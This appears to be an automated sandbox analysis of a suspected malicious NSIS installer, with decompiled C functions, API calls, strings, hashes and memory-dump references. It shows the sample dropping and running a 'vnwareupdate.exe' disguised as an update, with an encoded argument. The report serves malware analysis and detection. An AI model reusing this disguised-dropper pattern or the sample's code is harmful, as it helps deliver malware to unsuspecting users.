String ID: "C:\Users\user\Desktop\GZe6EcSTpO.exe" $"C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 606308-148026795
Opcode ID: 6eb3a8c6d4b6a1eb21d80e3e72b0c71cc60e502e6c5045bb4d9ce0f5c3d8f447
Instruction ID: 26e7699ed4e6b10e00d4509f8022fed07cb2a9a1b54ab9853cf40adcb97aba69
Opcode Fuzzy Hash: 6eb3a8c6d4b6a1eb21d80e3e72b0c71cc60e502e6c5045bb4d9ce0f5c3d8f447
Instruction Fuzzy Hash: 2B61C970340601BED620BB669D46F373EACEB54749F80447FF985B22E2CB7C59069A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402D63, Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00402D63(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\hardz\\Desktop\\GZe6EcSTpO.exe";
				 *0x42f410 = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\GZe6EcSTpO.exe", 0x400);
				_t89 = E00405B39(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\hardz\\Desktop";
				E00405FA0("C:\\Users\\hardz\\Desktop", _t91);
				E00405FA0(0x437000, E0040597F(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x42142c = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402CFF(1);
					__eflags =  *0x42f418 - _t82;
					if( *0x42f418 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E004031C4( *0x42f418 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402F9C(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42f414 = _t94;
							 *0x42f41c =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42f420 =  *0x42f420 + 1;
								__eflags =  *0x42f420;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405AF4(0x42f440, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004031C4( *0x415420);
					_t65 = E004031AE( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42f418) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004031AE(0x421430, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402CFF(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42f418;
						if( *0x42f418 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402CFF(0);
							}
							goto L20;
						}
						E00405AF4( &_v44, 0x421430, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x415420; // 0xffe4dc
						 *0x42f4c0 =  *0x42f4c0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42f418 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40a194
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x42142c; // 0xffe4e0
						if(__eflags < 0) {
							_v12 = E004063EF(_v12, 0x421430, _t90);
						}
						 *0x415420 =  *0x415420 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00402d6b
0x00402d6e
0x00402d71
0x00402d74
0x00402d7a
0x00402d8b
0x00402d90
0x00402da3
0x00402da8
0x00402dab
0x00402db1
0x00000000
0x00402db3
0x00402dbe
0x00402dc4
0x00402dd5
0x00402ddc
0x00402de2
0x00402de4
0x00402de9
0x00402deb
0x00402ed8
0x00402eda
0x00402edf
0x00402ee6
0x00000000
0x00000000
0x00402ee8
0x00402eeb
0x00402f0f
0x00402f14
0x00402f1a
0x00402f25
0x00402f2a
0x00402f2d
0x00402f2e
0x00402f2f
0x00402f31
0x00402f36
0x00402f39
0x00402f4c
0x00402f50
0x00402f58
0x00402f5d
0x00402f5f
0x00402f5f
0x00402f5f
0x00402f67
0x00402f67
0x00402f6a
0x00402f6b
0x00402f6b
0x00402f6e
0x00402f70
0x00402f70
0x00402f70
0x00402f7a
0x00402f80
0x00402f8e
0x00402f93
0x00000000
0x00402f93
0x00000000
0x00402f39
0x00402ef3
0x00402efe
0x00402f03
0x00402f05
0x00000000
0x00000000
0x00402f0a
0x00402f0d
0x00000000
0x00000000
0x00000000
0x00402df1
0x00402df6
0x00402dfb
0x00402dff
0x00402e06
0x00402e0b
0x00402e0d
0x00402e0f
0x00402e0f
0x00402e13
0x00402e18
0x00402e1a
0x00402f44
0x00402f3b
0x00000000
0x00402f3b
0x00402e20
0x00402e27
0x00402ea3
0x00402ea7
0x00402eab
0x00402eb0
0x00000000
0x00402ea7
0x00402e30
0x00402e35
0x00402e38
0x00402e3d
0x00000000
0x00000000
0x00402e3f
0x00402e46
0x00000000
0x00000000
0x00402e48
0x00402e4f
0x00000000
0x00000000
0x00402e51
0x00402e58
0x00000000
0x00000000
0x00402e5a
0x00402e61
0x00000000
0x00000000
0x00402e63
0x00402e69
0x00402e72
0x00402e78
0x00402e7b
0x00402e7d
0x00402e83
0x00000000
0x00000000
0x00402e89
0x00402e8d
0x00402e95
0x00402e95
0x00402e98
0x00402e98
0x00402e9b
0x00402e9d
0x00402e9f
0x00402e9f
0x00000000
0x00402e9d
0x00402e8f
0x00402e93
0x00000000
0x00000000
0x00000000
0x00402eb1
0x00402eb1
0x00402eb7
0x00402ec3
0x00402ec3
0x00402ec6
0x00402ecc
0x00402ece
0x00402ece
0x00402ed6
0x00402ed6
0x00000000
0x00402ed6

APIs

GetTickCount.KERNEL32 ref: 00402D74
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\GZe6EcSTpO.exe,00000400), ref: 00402D90

Part of subcall function 00405B39: GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\GZe6EcSTpO.exe,80000000,00000003), ref: 00405B3D
Part of subcall function 00405B39: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F

GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\GZe6EcSTpO.exe,C:\Users\user\Desktop\GZe6EcSTpO.exe,80000000,00000003), ref: 00402DDC

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00402D6A
Null, xrefs: 00402E5A
C:\Users\user\Desktop, xrefs: 00402DBE, 00402DC3, 00402DC9
Inst, xrefs: 00402E48
"C:\Users\user\Desktop\GZe6EcSTpO.exe" , xrefs: 00402D63
soft, xrefs: 00402E51
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F3B
Error launching installer, xrefs: 00402DB3
C:\Users\user\Desktop\GZe6EcSTpO.exe, xrefs: 00402D7A, 00402D89, 00402D9D, 00402DBD

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\GZe6EcSTpO.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\GZe6EcSTpO.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-1837261505
Opcode ID: 00d1b965a1d59fda06a3a273bf068ba94ac5e149fc6bff0e18746d034c1027b2
Instruction ID: 2bf3385630e85dd4df9d7bf2b803376e12afffe2b97a8d7f9aa5fd2bd7c684e6
Opcode Fuzzy Hash: 00d1b965a1d59fda06a3a273bf068ba94ac5e149fc6bff0e18746d034c1027b2
Instruction Fuzzy Hash: BD51F571900214ABDB219F65DE89B9F7AB8EB14368F50403BF904B72D0C7BC9D458BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00402F9C, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00402F9C(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t65;
				void* _t69;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x419428;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E004031C4( *0x42f478 + _t62);
				}
				if(E004031AE( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E004031AE(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E004031AE(0x415428, _t98) == 0) {
								goto L41;
							}
							_t69 = E00405BE0(_a8, 0x415428, _t98); // executed
							if(_t69 == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40bd8c =  *0x40bd8c & 0x00000000;
					 *0x40bd88 =  *0x40bd88 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40b870 = 8;
					 *0x415418 = 0x40d410;
					 *0x415414 = 0x40d410;
					 *0x415410 = 0x415410;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E004031AE(0x415428, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40b860 = 0x415428;
						 *0x40b864 = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40b868 = _t95;
							 *0x40b86c = _v12;
							_t75 = E0040645D("hUA");
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40b868; // 0x555cb4
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x42f4d4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E004050C7(0,  &_v88);
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40b868; // 0x555cb4
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E00405BE0(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

0x00402fa4
0x00402fa8
0x00402fab
0x00402fb0
0x00402fb2
0x00402fb2
0x00402fb9
0x00402fbd
0x00402fc2
0x00402fc4
0x00402fc4
0x00402fcb
0x00402fd0
0x00402fdb
0x00402fdb
0x00402fed
0x0040319c
0x0040319c
0x00000000
0x00402ff3
0x00402ff7
0x00403149
0x0040318c
0x0040318e
0x0040318e
0x0040319a
0x004031a1
0x004031a4
0x00000000
0x00000000
0x00000000
0x00000000
0x0040319a
0x0040314e
0x00000000
0x00000000
0x00403150
0x00403153
0x00403156
0x00403159
0x0040315b
0x0040315b
0x0040316b
0x00000000
0x00000000
0x00403172
0x00403179
0x00403143
0x00403143
0x0040319e
0x0040319e
0x00000000
0x0040319e
0x0040317b
0x0040317e
0x00403185
0x00000000
0x00000000
0x00000000
0x00403187
0x00000000
0x00403153
0x00403003
0x00403005
0x0040300c
0x00403013
0x00403013
0x0040301a
0x00403022
0x0040302c
0x00403031
0x00403039
0x00403043
0x00403046
0x00000000
0x00000000
0x00000000
0x00000000
0x0040304c
0x0040304c
0x0040304c
0x00403054
0x00403056
0x00403056
0x00403067
0x00000000
0x00000000
0x0040306d
0x00403070
0x00403076
0x0040307c
0x0040307c
0x00403087
0x0040308d
0x00403092
0x00403099
0x0040309c
0x00000000
0x00000000
0x004030a2
0x004030a8
0x004030aa
0x004030b3
0x004030b5
0x004030e3
0x004030e9
0x004030f2
0x004030f7
0x004030f7
0x004030fc
0x00403137
0x00000000
0x00000000
0x00000000
0x004030fe
0x00403102
0x00403119
0x0040311e
0x00403121
0x00403124
0x00403127
0x0040312b
0x00000000
0x00000000
0x00000000
0x00403131
0x0040310b
0x00403112
0x00000000
0x00000000
0x00403114
0x00000000
0x00403114
0x004030fc
0x0040313f
0x00000000
0x0040313f
0x00000000
0x0040304c

APIs

GetTickCount.KERNEL32 ref: 00403003
GetTickCount.KERNEL32 ref: 004030AA
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 004030D3
wsprintfA.USER32 ref: 004030E3

Strings

hUA, xrefs: 00403070, 00403082
(TA, xrefs: 00403059
(TA, xrefs: 0040315D
... %d%%, xrefs: 004030DD

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CountTick$wsprintf
String ID: (TA$(TA$... %d%%$hUA
API String ID: 551687249-826216931
Opcode ID: a0691e7d4b1972c1c6b665dba6ae3b2a2bfd9af5d6c8964951a9ca70517b3b3f
Instruction ID: 5c281e24a88a3bae7ae2a550c5808c60fec2149314028a17d76778b6f2aa7d1b
Opcode Fuzzy Hash: a0691e7d4b1972c1c6b665dba6ae3b2a2bfd9af5d6c8964951a9ca70517b3b3f
Instruction Fuzzy Hash: BB518171900219DBDB00DF66DA4479E7BB8EF4875AF10453BE814BB2D0C7789E40CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402ACB(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E004059A5(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405938(E00405FA0(0x40a418, "C:\\Users\\hardz\\Desktop")), ??);
				} else {
					_push(0x40a418);
					E00405FA0();
				}
				E0040620A(0x40a418);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E004062A3(0x40a418);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405B14(0x40a418);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405B39(0x40a418, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E004050C7(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42f4a8;
						goto L32;
					} else {
						E00405FA0(0x40ac18, 0x430000);
						E00405FA0(0x430000, 0x40a418);
						E00405FC2(_t75, 0x40ac18, 0x40a418, "C:\Users\hardz\Desktop\Uninstall.exe",  *((intOrPtr*)(_t85 - 0x14)));
						E00405FA0(0x430000, 0x40ac18);
						_t62 = E004056BC("C:\Users\hardz\Desktop\Uninstall.exe",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42f4a8 =  &( *0x42f4a8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x40a418);
								_push(0xfffffffa);
								E004050C7();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E004050C7(0xffffffea,  *(_t85 - 8));
				 *0x42f4d4 =  *0x42f4d4 + 1;
				_t43 = E00402F9C( *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
				 *0x42f4d4 =  *0x42f4d4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405FC2(_t75, _t80, 0x40a418, 0x40a418, 0xffffffee);
					} else {
						E00405FC2(_t75, _t80, 0x40a418, 0x40a418, 0xffffffe9);
						lstrcatA(0x40a418,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x40a418);
					E004056BC();
					goto L29;
				}
				goto L33;
			}

0x00401759
0x00401760
0x00401769
0x0040176c
0x0040176f
0x00401774
0x0040177c
0x00401798
0x0040177e
0x0040177e
0x0040177f
0x0040177f
0x0040179e
0x004017a8
0x004017a8
0x004017ac
0x004017af
0x004017b4
0x004017b6
0x004017b8
0x004017bd
0x004017bd
0x004017c8
0x004017c8
0x004017d9
0x004017db
0x004017db
0x004017dc
0x004017dc
0x004017df
0x004017e2
0x004017e5
0x004017e5
0x004017ec
0x004017fb
0x00401800
0x00401803
0x00401806
0x00000000
0x00000000
0x00401808
0x0040180b
0x00401865
0x0040186a
0x004015b0
0x0040271c
0x0040271c
0x00402957
0x0040295a
0x0040295a
0x00000000
0x0040180d
0x00401813
0x0040181e
0x0040182b
0x00401836
0x0040184c
0x0040184c
0x0040184f
0x00000000
0x00401855
0x00401855
0x00401856
0x00401873
0x00402960
0x00402960
0x00402960
0x00401858
0x00401858
0x00401859
0x00401492
0x004022e7
0x004022e7
0x004022e7
0x00401856
0x0040184f
0x00402962
0x00402966
0x00402966
0x00401883
0x00401888
0x00401896
0x0040189b
0x004018a1
0x004018a5
0x004018a7
0x004018af
0x004018bb
0x004018a9
0x004018a9
0x004018ad
0x00000000
0x00000000
0x004018ad
0x004018c4
0x004018ca
0x004018cc
0x00000000
0x004018d2
0x004018d2
0x004018d5
0x004018ed
0x004018d7
0x004018da
0x004018e3
0x004018e3
0x004018f2
0x004018f7
0x004022e2
0x00000000
0x004022e2
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,"C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD,C:\Users\user\Desktop,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD,"C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD,00000000,00000000,"C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD,C:\Users\user\Desktop,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 00405FA0: lstrcpynA.KERNEL32(?,?,00000400,004032DE,Vnware Update Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FAD

Part of subcall function 004050C7: lstrlenA.KERNEL32(0042A050,00000000,00555CB4,74B5EA30,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,0042A050,00000000,00555CB4,74B5EA30,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
Part of subcall function 004050C7: lstrcatA.KERNEL32(0042A050,004030F7,004030F7,0042A050,00000000,00555CB4,74B5EA30), ref: 00405123
Part of subcall function 004050C7: SetWindowTextA.USER32(0042A050,0042A050), ref: 00405135
Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183

Strings

"C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD, xrefs: 00401775, 0040177E, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7
C:\Users\user\Desktop\Uninstall.exe, xrefs: 00401826, 00401842
C:\Users\user\Desktop, xrefs: 00401786

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: "C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVD$C:\Users\user\Desktop$C:\Users\user\Desktop\Uninstall.exe
API String ID: 1941528284-557988399
